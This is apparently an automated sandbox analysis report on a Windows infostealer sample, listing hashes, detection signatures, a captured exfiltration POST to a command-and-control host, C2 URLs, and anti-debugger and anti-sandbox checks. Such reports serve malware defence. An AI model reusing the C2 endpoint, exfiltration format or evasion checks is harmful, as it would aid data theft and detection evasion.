Edit tour

Windows Analysis Report
u57m8aCdwb.exe

Overview

General Information

Sample name:	u57m8aCdwb.exe renamed because original name is a hash value
Original sample name:	0e6e12f9a9c017b4be17933aeacd543c.exe
Analysis ID:	1578886
MD5:	0e6e12f9a9c017b4be17933aeacd543c
SHA1:	4c8fda6bdcbb813081a6d72bd6ad3ff430e17bee
SHA256:	738cdc197a8ece363679b55f005dccd3a943e4b333d69e946f80ff6c0445cd87
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

u57m8aCdwb.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\u57m8aCdwb.exe" MD5: 0E6E12F9A9C017B4BE17933AEACD543C)

cleanup

HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 559528Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 37 35 38 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 2

Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: u57m8aCdwb.exe, 00000000.00000002.2644502123.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642615492.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642594319.00000000019B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
Source: u57m8aCdwb.exe, 00000000.00000002.2644502123.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642615492.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642594319.00000000019B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm17345798505a1
Source: u57m8aCdwb.exe, 00000000.00000002.2644502123.00000000019B9000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642615492.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2642594319.00000000019B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3
Source: u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000003.2642240904.0000000001A31000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2644842033.0000000001A32000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641805041.0000000001A15000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641842624.0000000001A21000.00000004.00000020.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000003.2641368000.0000000001A13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: u57m8aCdwb.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: u57m8aCdwb.exe, u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714

System Summary

PE file contains section with special chars

Source: u57m8aCdwb.exe	Static PE information: section name:
Source: u57m8aCdwb.exe	Static PE information: section name: .idata
Source: u57m8aCdwb.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005105B0	0_2_005105B0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00516FA0	0_2_00516FA0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0053F100	0_2_0053F100
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005CB180	0_2_005CB180
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0088E030	0_2_0088E030
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005D00E0	0_2_005D00E0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00566210	0_2_00566210
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005CC320	0_2_005CC320
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005D0420	0_2_005D0420
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00854410	0_2_00854410
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0050E620	0_2_0050E620
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00884780	0_2_00884780
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005CC770	0_2_005CC770
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0056A7F0	0_2_0056A7F0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00866730	0_2_00866730
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00514940	0_2_00514940
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0050A960	0_2_0050A960
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005BC900	0_2_005BC900
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_006D6AC0	0_2_006D6AC0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_007BAAC0	0_2_007BAAC0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00694B60	0_2_00694B60
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_007BAB2C	0_2_007BAB2C
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00878BF0	0_2_00878BF0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0050CBB0	0_2_0050CBB0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0088CC70	0_2_0088CC70
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0087CD80	0_2_0087CD80
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00884D40	0_2_00884D40
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_006C0D80	0_2_006C0D80
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0081AE30	0_2_0081AE30
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00852F90	0_2_00852F90
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00524F70	0_2_00524F70
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005CEF90	0_2_005CEF90
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005C8F90	0_2_005C8F90
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005110E6	0_2_005110E6
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_0086D430	0_2_0086D430
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_008735B0	0_2_008735B0
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00891780	0_2_00891780
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005B9880	0_2_005B9880

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 005075A0 appears 568 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 005073F0 appears 99 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 00544FD0 appears 211 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 006B7220 appears 89 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 00544F40 appears 277 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 00545340 appears 39 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 005E44A0 appears 58 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 0050CAA0 appears 62 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 005071E0 appears 43 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 0051CD40 appears 64 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 005450A0 appears 82 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 0051CCD0 appears 53 times
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: String function: 006DCBC0 appears 73 times

Source: u57m8aCdwb.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: u57m8aCdwb.exe

Static PE information: Section: krimtaup ZLIB complexity 0.9942812810107741

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@8/2

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Code function: 0_2_0050255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0050255D

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Code function: 0_2_005029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_005029FF

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: u57m8aCdwb.exe

ReversingLabs: Detection: 47%

Source: u57m8aCdwb.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: u57m8aCdwb.exe	String found in binary or memory: Unable to complete request for channel-process-startup

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: u57m8aCdwb.exe

Static file information: File size 4455936 > 1048576

Source: u57m8aCdwb.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: u57m8aCdwb.exe	Static PE information: Raw size of krimtaup is bigger than: 0x100000 < 0x1b8e00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\u57m8aCdwb.exe

Unpacked PE file: 0.2.u57m8aCdwb.exe.500000.0.unpack :EW;.rsrc:W;.idata :W; :EW;krimtaup:EW;xiywmuay:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;krimtaup:EW;xiywmuay:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: u57m8aCdwb.exe

Static PE information: real checksum: 0x448081 should be: 0x44a0f6

Source: u57m8aCdwb.exe	Static PE information: section name:
Source: u57m8aCdwb.exe	Static PE information: section name: .idata
Source: u57m8aCdwb.exe	Static PE information: section name:
Source: u57m8aCdwb.exe	Static PE information: section name: krimtaup
Source: u57m8aCdwb.exe	Static PE information: section name: xiywmuay
Source: u57m8aCdwb.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A2A926 push ecx; iretd	0_3_01A2A92D
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_3_01A1FE38 push eax; ret	0_3_01A1FE39
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_008841D0 push eax; mov dword ptr [esp], edx	0_2_008841D5
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00582340 push eax; mov dword ptr [esp], 00000000h	0_2_00582343
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_005BC7F0 push eax; mov dword ptr [esp], 00000000h	0_2_005BC743
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00540AC0 push eax; mov dword ptr [esp], 00000000h	0_2_00540AC4
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Code function: 0_2_00561430 push eax; mov dword ptr [esp], 00000000h	0_2_00561433

Source: u57m8aCdwb.exe

Static PE information: section name: krimtaup entropy: 7.9553189741670245

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: u57m8aCdwb.exe, 00000000.00000003.2229720908.0000000007570000.00000004.00001000.00020000.00000000.sdmp, u57m8aCdwb.exe, 00000000.00000002.2642863152.0000000000AC1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: C30186 second address: C3018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: C3018C second address: C301AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: C301AF second address: C301B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: C301B3 second address: C301B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB0CD9 second address: DB0CEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
